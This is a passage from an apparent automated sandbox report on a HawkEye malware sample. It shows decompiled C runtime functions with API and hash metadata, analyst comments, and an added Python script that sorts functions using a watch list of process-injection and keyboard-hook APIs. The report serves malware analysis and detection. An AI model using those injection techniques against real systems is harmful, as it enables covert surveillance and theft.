                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: af880634157490556b9c76908c703a8580cc2849bb7bd0e485ad11b23e9f96c6
                                                  • Instruction ID: c19d67b2071e78ec7325df68262854b1423eeda200476dda26131c03950a0fd5
                                                  • Opcode Fuzzy Hash: af880634157490556b9c76908c703a8580cc2849bb7bd0e485ad11b23e9f96c6
                                                  • Instruction Fuzzy Hash: 72111CB1540B08BBEA30BBB0CD07FDB7BDCAF55740F404955B3A9A60D2DB69B9088750
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%
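                                                   The C-Code / APIs / Similarity blocks above (one per function) are what an analyst has to skim to find the malware's own code among the statically linked runtime. As an added example that is not part of this report and not a Joe Sandbox feature, the Python below parses such blocks from a plain-text export and sorts each function into CRT-like noise, injection/hooking candidates, or "review". The input is constructed from trimmed copies of two blocks on this page plus one hypothetical block (EDEADBEEF, ref DEADBEF0); the noise and watch lists are the editor's own heuristic.

```python
"""Added example: triage the per-function blocks of a Joe Sandbox report saved as text."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

QUALITY_RE = re.compile(r"^C-Code - Quality:\s*(\d+)%")
FUNC_RE = re.compile(r"^(E[0-9A-F]{8})\(")
SUBCALL_RE = re.compile(r"^Part of subcall function ([0-9A-F]{8}):\s*(.*)$")
CALL_RE = re.compile(r"^([A-Za-z_]\w*)\.([A-Z0-9_]+)(?:\(([^)]*)\))?,?\s*ref:\s*([0-9A-F]{8})$")
FIELD_RE = re.compile(r"^(API ID|String ID|API String ID|Instruction Fuzzy Hash):\s*(.*)$")

# Constructed input in the shape of this report's blocks: the first two are trimmed
# copies of blocks on this page, the third (EDEADBEEF, ref DEADBEF0) is hypothetical.
SAMPLE = """\
C-Code - Quality: 100%
            E00B048DE(intOrPtr _a4) {
                E00B045C4(_t45 + 0xb4, 7);
APIs
  • Part of subcall function 00B045C4: _free.LIBCMT ref: 00B045E9
  • Part of subcall function 00AF4D62: HeapFree.KERNEL32(00000000,00000000,?,00AF440C), ref: 00AF4D78
• _free.LIBCMT ref: 00B04937
Memory Dump Source
• Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
Similarity
• API ID: _free$ErrorFreeHeapLast
C-Code - Quality: 100%
            E00AF8885(void* __ecx, signed int* _a4, intOrPtr _a8) {
Similarity
• String ID: api-ms-$ext-ms-
C-Code - Quality: 100%
            EDEADBEEF(void* __ecx) {
APIs
• SetWindowsHookExW.USER32(0000000D,?,00000000,00000000), ref: DEADBEF0
Similarity
• API ID: HookWindows
"""

@dataclass
class Call:
    name: str
    module: str
    args: str
    ref: str
    caller: Optional[str] = None  # set for "Part of subcall function" entries

@dataclass
class Func:
    name: str = ""
    quality: Optional[int] = None
    calls: List[Call] = field(default_factory=list)
    subcalls: List[Call] = field(default_factory=list)
    fields: Dict[str, str] = field(default_factory=dict)

def parse(text: str) -> List[Func]:
    funcs: List[Func] = []
    cur: Optional[Func] = None
    expect_signature = False
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if not line:
            continue
        q = QUALITY_RE.match(line)
        if q:  # "C-Code - Quality" opens a block; the APIs/Similarity metadata follows the code
            cur = Func(quality=int(q.group(1)))
            funcs.append(cur)
            expect_signature = True
            continue
        if expect_signature:  # only the line after the quality line is the signature; body
            expect_signature = False  # lines also start with E########( calls (see SAMPLE)
            m = FUNC_RE.match(line)
            if m and cur is not None:
                cur.name = m.group(1)
            continue
        if cur is None:
            continue
        sub = SUBCALL_RE.match(line)
        c = CALL_RE.match(sub.group(2) if sub else line)
        if c:
            call = Call(c.group(1), c.group(2), c.group(3) or "", c.group(4), sub.group(1) if sub else None)
            (cur.subcalls if sub else cur.calls).append(call)
            continue
        f = FIELD_RE.match(line)
        if f:
            cur.fields[f.group(1)] = f.group(2).strip()
    return funcs

# Editor's heuristic lists, not a Joe Sandbox feature.
CRT_NOISE = {"_free", "GetLastError", "SetLastError", "HeapFree", "HeapAlloc", "TlsGetValue",
             "TlsSetValue", "FlsGetValue", "FlsSetValue", "LoadLibraryExW", "FreeLibrary",
             "MultiByteToWideChar", "WideCharToMultiByte"}
CRT_STRINGS = {"api-ms-$ext-ms-"}  # the UCRT's API-set prefixes, as in E00AF8885 above
WATCH = {"SetWindowsHookExW", "SetWindowsHookExA", "WriteProcessMemory", "VirtualAllocEx",
         "CreateRemoteThread", "SetThreadContext", "ResumeThread", "NtUnmapViewOfSection"}

def classify(fn: Func) -> str:
    names = {c.name for c in fn.calls} | {c.name for c in fn.subcalls}
    strings = fn.fields.get("String ID", "")
    if names & WATCH:
        return "injection/hooking"
    if names <= CRT_NOISE and strings in CRT_STRINGS | {""} and (names or strings):
        return "crt-like"
    return "review"  # includes functions with no API or string references at all

def triage(text: str) -> List[Tuple[str, str]]:
    return [(fn.name, classify(fn)) for fn in parse(text)]
```

                                                   A function is marked "crt-like" only when every API it references is on the noise list and its String ID is empty or the UCRT api-set prefixes; anything else stays in "review" and has to be read, including functions whose Similarity block is empty (E00AFA4BB on this page). Extend WATCH with the APIs behind the signatures the report flags in its summary (global keyboard hook, PE injection, process hollowing) for the sample at hand.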

                                                  C-Code - Quality: 95%
                                                   			// Analyst note: runtime library code statically linked into the sample, not HawkEye's
                                                   			// own logic. Returns the calling thread's per-thread data block, allocating it on first
                                                   			// use. *0xb26020 is an FLS/TLS index (0xffffffff = runtime not initialised, return 0);
                                                   			// L00AD2DC3/L00AD2DFD read as the FlsGetValue/FlsSetValue wrappers, E00AF4F03(1, 0x28)
                                                   			// as calloc and L00AF4D62 as free. The slot is first set to -1 as an "allocation in
                                                   			// progress" marker (a re-entrant caller that sees -1 gets 0), then to the new 0x28-byte
                                                   			// block; on any failure the slot is reset to 0 and the block freed. GetLastError() is
                                                   			// saved and restored so the caller's last-error value survives. The shape matches
                                                   			// vcruntime's __vcrt_getptd_noexit.
                                                   			E00AD2810(void* __ecx, void* __edx) {
                                                  				void* _t4;
                                                  				void* _t11;
                                                  				void* _t16;
                                                  				long _t26;
                                                  				void* _t29;
                                                  
                                                  				if( *0xb26020 != 0xffffffff) {
                                                  					_t26 = GetLastError();
                                                  					_t11 = L00AD2DC3(__eflags,  *0xb26020);
                                                  					__eflags = _t11 - 0xffffffff;
                                                  					if(_t11 == 0xffffffff) {
                                                  						L5:
                                                  						_t11 = 0;
                                                  					} else {
                                                  						__eflags = _t11;
                                                  						if(__eflags == 0) {
                                                  							_t4 = L00AD2DFD(__eflags,  *0xb26020, 0xffffffff);
                                                  							_pop(_t16);
                                                  							__eflags = _t4;
                                                  							if(_t4 != 0) {
                                                  								_t29 = E00AF4F03(_t16, 1, 0x28);
                                                  								__eflags = _t29;
                                                  								if(__eflags == 0) {
                                                  									L8:
                                                  									_t11 = 0;
                                                  									L00AD2DFD(__eflags,  *0xb26020, 0);
                                                  								} else {
                                                  									__eflags = L00AD2DFD(__eflags,  *0xb26020, _t29);
                                                  									if(__eflags != 0) {
                                                  										_t11 = _t29;
                                                  										_t29 = 0;
                                                  										__eflags = 0;
                                                  									} else {
                                                  										goto L8;
                                                  									}
                                                  								}
                                                  								L00AF4D62(_t29);
                                                  							} else {
                                                  								goto L5;
                                                  							}
                                                  						}
                                                  					}
                                                  					SetLastError(_t26);
                                                  					return _t11;
                                                  				} else {
                                                  					return 0;
                                                  				}
                                                  			}

                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,00AD22D4,00AD15A6), ref: 00AD281E
                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00AD282C
                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00AD2845
                                                  • SetLastError.KERNEL32(00000000,?,00AD22D4,00AD15A6), ref: 00AD2897
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: ErrorLastValue___vcrt_
                                                  • String ID:
                                                  • API String ID: 3852720340-0
                                                  • Opcode ID: 7f899c5ded760e0f8069bf76c12e6a855665a0844242f0d54b61e8d80a0c3243
                                                  • Instruction ID: 0945714f76325d89bb6acec5137897973da28b26e91f705f77a7c1512b3be25c
                                                  • Opcode Fuzzy Hash: 7f899c5ded760e0f8069bf76c12e6a855665a0844242f0d54b61e8d80a0c3243
                                                  • Instruction Fuzzy Hash: DA01B5325083515EE6352B78AC85F6B3B65EF29771720022BF112522E4EF514C01F790
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 76%
                                                  			E00B179A0(void* __ebx, void* __ecx, void* __edx, void* __eflags) {
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				void* _t11;
                                                  				void* _t13;
                                                  				void* _t15;
                                                  				void* _t17;
                                                  				void* _t18;
                                                  				void* _t20;
                                                  				void* _t21;
                                                  				void* _t23;
                                                  
                                                  				_t14 = __edx;
                                                  				_t13 = __ecx;
                                                  				E00AE3965(__ebx, __edx, _t15, _t18);
                                                  				0xb27e6c->X = 0xa0014;
                                                  				SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  				E00AD1080(_t13, "LOADING........", "cls");
                                                  				_push("\n\n");
                                                  				E00AD1080(_t13);
                                                  				_t23 = _t21 + 0xc;
                                                  				0xb27e6c->X = 0xb0016;
                                                  				SetConsoleCursorPosition(GetStdHandle(0xfffffff5),  *0xb27e6c);
                                                  				_t17 = 0x13;
                                                  				do {
                                                  					_t1 = E00AD9A54(_t14) + 0x64; // 0x64
                                                  					_t20 = _t1;
                                                  					do {
                                                  					} while (_t20 > E00AD9A54(_t14));
                                                  					_t11 = E00AD1080(_t13, "%c", 0xdb);
                                                  					_t23 = _t23 + 8;
                                                  					_t17 = _t17 - 1;
                                                  				} while (_t17 != 0);
                                                  				return _t11;
                                                  			}

                                                  APIs
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B179C7
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B179D0
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B179FB
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B179FE
                                                    • Part of subcall function 00AD9A54: QueryPerformanceCounter.KERNEL32(?,?,?,?,?,00B17C67), ref: 00AD9A73
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: ConsoleCursorHandlePosition$CounterPerformanceQuery
                                                  • String ID: LOADING........$cls
                                                  • API String ID: 845668441-2250302636
                                                  • Opcode ID: f950f40d6ef6a5149d91f8c02dcf90c36b500e5c753cc788c69937c89e797937
                                                  • Instruction ID: 1f71258da1198e6aac35f5c829630629022a52d9271f45474d058175c42ed23a
                                                  • Opcode Fuzzy Hash: f950f40d6ef6a5149d91f8c02dcf90c36b500e5c753cc788c69937c89e797937
                                                  • Instruction Fuzzy Hash: EEF0CD73D4415465CA30B7A5BD06D8A3998DF49764B464191F118232B2DEB059498B71
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • __allrem.LIBCMT ref: 00B00AC6
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B00AE2
                                                  • __allrem.LIBCMT ref: 00B00AF9
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B00B17
                                                  • __allrem.LIBCMT ref: 00B00B2E
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B00B4C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                  • String ID:
                                                  • API String ID: 1992179935-0
                                                  • Opcode ID: fa4a4711b2c80aca952a967196ba22a9383e1263a886d1e3422cfe420c5c00d9
                                                  • Instruction ID: c7a72adb557f75f37f71ac8a56ee955c014e8b5d4406c181117b9321d0bff1b4
                                                  • Opcode Fuzzy Hash: fa4a4711b2c80aca952a967196ba22a9383e1263a886d1e3422cfe420c5c00d9
                                                  • Instruction Fuzzy Hash: B581FB71A107069BE720BF6CCC82B6A7BE8EF44764F1485ADF515D72D2EBB0D9408790
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,00B027F4,00000000,?,?,?,00B09647,?,?,00000100), ref: 00B09487
                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000,?,?,?,00B09647,?,?,00000100,5EFC4D8B,?,?), ref: 00B094F0
                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,?,00000000,?,00000000,00000000,00000000,00000000), ref: 00B095D0
                                                  • __freea.LIBCMT ref: 00B095DD
                                                    • Part of subcall function 00AF4D9C: HeapAlloc.KERNEL32(00000000,00000000,00000000,?,00B023E1,00000220,00000000,00000000,00000001), ref: 00AF4DCE
                                                  • __freea.LIBCMT ref: 00B095E6
                                                  • __freea.LIBCMT ref: 00B0960B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: ByteCharMultiWide__freea$AllocHeap
                                                  • String ID:
                                                  • API String ID: 3147120248-0
                                                  • Opcode ID: dd90fabec8cbfeaca1f2b47ee9df282440ad6515f5361573bfc0ac7a69d7f6d2
                                                  • Instruction ID: f6897e9bf4bfdd99e451b7011cfcff0398ffbd8847f00793426db43f0e42e676
                                                  • Opcode Fuzzy Hash: dd90fabec8cbfeaca1f2b47ee9df282440ad6515f5361573bfc0ac7a69d7f6d2
                                                  • Instruction Fuzzy Hash: 1F51B17250020AAFEF269F55CC85EBB3BE9EB54B50F1541A9F905A7282EB31DC1186A0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • _free.LIBCMT ref: 00B0C905
                                                    • Part of subcall function 00AF68E9: IsProcessorFeaturePresent.KERNEL32(00000017,00AF68BB,?,?,?,?,?,?,?,?,00AF68C8,00000000,00000000,00000000,00000000,00000000), ref: 00AF68EB
                                                    • Part of subcall function 00AF68E9: GetCurrentProcess.KERNEL32(C0000417), ref: 00AF690E
                                                    • Part of subcall function 00AF68E9: TerminateProcess.KERNEL32(00000000), ref: 00AF6915
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                  • String ID: SystemRoot
                                                  • API String ID: 2667617558-2034820756
                                                  • Opcode ID: 0a425a84d31f59bbb3214c7d56d006f1b16a8d6fd369e2cee5b06772013f458f
                                                  • Instruction ID: b84dbea03b70cda2b9ad1c894f27bab2ddbd072476e2c1df408a07a70edd55ea
                                                  • Opcode Fuzzy Hash: 0a425a84d31f59bbb3214c7d56d006f1b16a8d6fd369e2cee5b06772013f458f
                                                  • Instruction Fuzzy Hash: 4B91A071D0020A9BDF15CFA8C881BBEBFF5EF49304F1842A9E445A7282D7759D45CB60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32(00000000,00B26F3A,00000104), ref: 00AF1886
                                                    • Part of subcall function 00AF68E9: IsProcessorFeaturePresent.KERNEL32(00000017,00AF68BB,?,?,?,?,?,?,?,?,00AF68C8,00000000,00000000,00000000,00000000,00000000), ref: 00AF68EB
                                                    • Part of subcall function 00AF68E9: GetCurrentProcess.KERNEL32(C0000417), ref: 00AF690E
                                                    • Part of subcall function 00AF68E9: TerminateProcess.KERNEL32(00000000), ref: 00AF6915
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: Process$CurrentFeatureFileModuleNamePresentProcessorTerminate
                                                  • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                  • API String ID: 872218275-4022980321
                                                  • Opcode ID: 6a2f49acfbcf2665fb391580471eb9aa60f93499127a79af712403b8b4e9a2ff
                                                  • Instruction ID: cc08475fd6d5414aaddb55d2622af8c6a3fa95940e8b289a75a4012ae1896ef8
                                                  • Opcode Fuzzy Hash: 6a2f49acfbcf2665fb391580471eb9aa60f93499127a79af712403b8b4e9a2ff
                                                  • Instruction Fuzzy Hash: 5621F73268020DB6DF252B95ED82EBB3B9E9B90794F400064FE08521A1E761CE62C1D1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 27%
                                                  			E00403632(void* __ecx, intOrPtr _a4) {
                                                  				signed int _v8;
                                                  				signed int _v12;
                                                  				signed int _t10;
                                                  				int _t13;
                                                  				int _t19;
                                                  				signed int _t21;
                                                  
                                                  				_t10 =  *0x412014; // 0x9e6834eb
                                                  				_v8 = _t10 ^ _t21;
                                                  				_v12 = _v12 & 0x00000000;
                                                  				_t13 =  *0x40c0dc(0, L"mscoree.dll",  &_v12, __ecx, __ecx);
                                                  				if(_t13 != 0) {
                                                  					_t13 = GetProcAddress(_v12, "CorExitProcess");
                                                  					_t19 = _t13;
                                                  					if(_t19 != 0) {
                                                  						E0040C15C();
                                                  						_t13 =  *_t19(_a4);
                                                  					}
                                                  				}
                                                  				if(_v12 != 0) {
                                                  					_t13 = FreeLibrary(_v12);
                                                  				}
                                                  				E004018CC();
                                                  				return _t13;
                                                  			}

                                                  APIs
                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002), ref: 00403652
                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00403665
                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002,00000000), ref: 00403688
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301261564.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                  • String ID: CorExitProcess$mscoree.dll
                                                  • API String ID: 4061214504-1276376045
                                                  • Opcode ID: cf427baca09bca2fe7784295da489c0a85b1d2c95ce850e6db67983e50b5df7d
                                                  • Instruction ID: 2a5f1b52f49e2644cdc997ca28138b4c7ff7fe3d24fc8903f8dd75b8825c5772
                                                  • Opcode Fuzzy Hash: cf427baca09bca2fe7784295da489c0a85b1d2c95ce850e6db67983e50b5df7d
                                                  • Instruction Fuzzy Hash: D7F0A431A0020CFBDB109FA1DD49B9EBFB9EB04711F00427AF805B22A0DB754A40CA98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00AD90AE,?,?,00AD9076,?,?), ref: 00AD90F7
                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00AD910A
                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,00AD90AE,?,?,00AD9076,?,?), ref: 00AD912D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                  • String ID: CorExitProcess$mscoree.dll
                                                  • API String ID: 4061214504-1276376045
                                                  • Opcode ID: a7a5815d73a682c089b160f8526b3464930681cb6c408b50cdd468f014fd370d
                                                  • Instruction ID: bfb3a324a115986d73c161d84921b83319f61b7e630b887d38c9b0d375035d4b
                                                  • Opcode Fuzzy Hash: a7a5815d73a682c089b160f8526b3464930681cb6c408b50cdd468f014fd370d
                                                  • Instruction Fuzzy Hash: 2CF04F31A50218FBCB219F90DC0DFDEBFB9EF08751F4141A9B806A2260CF348A85DA90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,00AF89FD), ref: 00AF8A53
                                                  • GetLastError.KERNEL32(?,00AF89FD), ref: 00AF8A5D
                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 00AF8A9B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: LibraryLoad$ErrorLast
                                                  • String ID: api-ms-$ext-ms-
                                                  • API String ID: 3177248105-537541572
                                                  • Opcode ID: edcb6bb7d3cb3d80d125f31cd5368b9a97c317907edd56828219fcf3c0dda3f7
                                                  • Instruction ID: 53cf63851472bbe17ea75c21d366cbf8d11f0fa43af06e81d893eaa7b0f1dc07
                                                  • Opcode Fuzzy Hash: edcb6bb7d3cb3d80d125f31cd5368b9a97c317907edd56828219fcf3c0dda3f7
                                                  • Instruction Fuzzy Hash: AFF012317D4209BAEB106BA1EC06F693E95EB10B90F554061FB4CA84E1EF75D9608644
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00AF4D9C: HeapAlloc.KERNEL32(00000000,00000000,00000000,?,00B023E1,00000220,00000000,00000000,00000001), ref: 00AF4DCE
                                                  • _free.LIBCMT ref: 00AF395A
                                                  • _free.LIBCMT ref: 00AF3971
                                                  • _free.LIBCMT ref: 00AF3990
                                                  • _free.LIBCMT ref: 00AF39AB
                                                  • _free.LIBCMT ref: 00AF39C2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: _free$AllocHeap
                                                  • String ID:
                                                  • API String ID: 1835388192-0
                                                  • Opcode ID: e63fe6fa5ed32ef674e30602b061ec98cb6d32fc19251bda99acdb506aef9a9e
                                                  • Instruction ID: 7e5f55b76c90c4c01101d498e5ddc2197fda083bb8a27514b0a474b72a8a8c46
                                                  • Opcode Fuzzy Hash: e63fe6fa5ed32ef674e30602b061ec98cb6d32fc19251bda99acdb506aef9a9e
                                                  • Instruction Fuzzy Hash: 3551C372A00308AFDF20DFA9C891A7AB7F4EF58720F14456DFA49D7250E775EA018B80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID:
                                                  • API String ID: 269201875-0
                                                  • Opcode ID: 64aad740e4554ef81f33a60b8c3ee7f4c85f031c4da33fb0eb6282ce3892ba5a
                                                  • Instruction ID: cbe9fbf6d8af29b0d4133e5ad0e463463ee91587e23446d91c940e3b72759890
                                                  • Opcode Fuzzy Hash: 64aad740e4554ef81f33a60b8c3ee7f4c85f031c4da33fb0eb6282ce3892ba5a
                                                  • Instruction Fuzzy Hash: 9441A376A002049FDB24DFB8C881AAEB7F5EF88714F1545A9F615EB391DB31AD01DB80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 79%
                                                  			E004062B8(void* __edx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
                                                  				signed int _v8;
                                                  				int _v12;
                                                  				char _v16;
                                                  				intOrPtr _v24;
                                                  				char _v28;
                                                  				void* _v40;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				signed int _t34;
                                                  				signed int _t40;
                                                  				int _t45;
                                                  				int _t52;
                                                  				void* _t53;
                                                  				void* _t55;
                                                  				int _t57;
                                                  				signed int _t63;
                                                  				int _t67;
                                                  				short* _t71;
                                                  				signed int _t72;
                                                  				short* _t73;
                                                  
                                                  				_t34 =  *0x412014; // 0x9e6834eb
                                                  				_v8 = _t34 ^ _t72;
                                                  				_push(_t53);
                                                  				E00403F2B(_t53,  &_v28, __edx, _a4);
                                                  				_t57 = _a24;
                                                  				if(_t57 == 0) {
                                                  					_t52 =  *(_v24 + 8);
                                                  					_t57 = _t52;
                                                  					_a24 = _t52;
                                                  				}
                                                  				_t67 = 0;
                                                  				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
                                                  				_v12 = _t40;
                                                  				if(_t40 == 0) {
                                                  					L15:
                                                  					if(_v16 != 0) {
                                                  						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
                                                  					}
                                                  					E004018CC();
                                                  					return _t67;
                                                  				}
                                                  				_t55 = _t40 + _t40;
                                                  				_t17 = _t55 + 8; // 0x8
                                                  				asm("sbb eax, eax");
                                                  				if((_t17 & _t40) == 0) {
                                                  					_t71 = 0;
                                                  					L11:
                                                  					if(_t71 != 0) {
                                                  						E00402460(_t67, _t71, _t67, _t55);
                                                  						_t45 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t71, _v12);
                                                  						if(_t45 != 0) {
                                                  							_t67 = GetStringTypeW(_a8, _t71, _t45, _a20);
                                                  						}
                                                  					}
                                                  					L14:
                                                  					E004063D5(_t71);
                                                  					goto L15;
                                                  				}
                                                  				_t20 = _t55 + 8; // 0x8
                                                  				asm("sbb eax, eax");
                                                  				_t47 = _t40 & _t20;
                                                  				_t21 = _t55 + 8; // 0x8
                                                  				_t63 = _t21;
                                                  				if((_t40 & _t20) > 0x400) {
                                                  					asm("sbb eax, eax");
                                                  					_t71 = E00403E3D(_t63, _t47 & _t63);
                                                  					if(_t71 == 0) {
                                                  						goto L14;
                                                  					}
                                                  					 *_t71 = 0xdddd;
                                                  					L9:
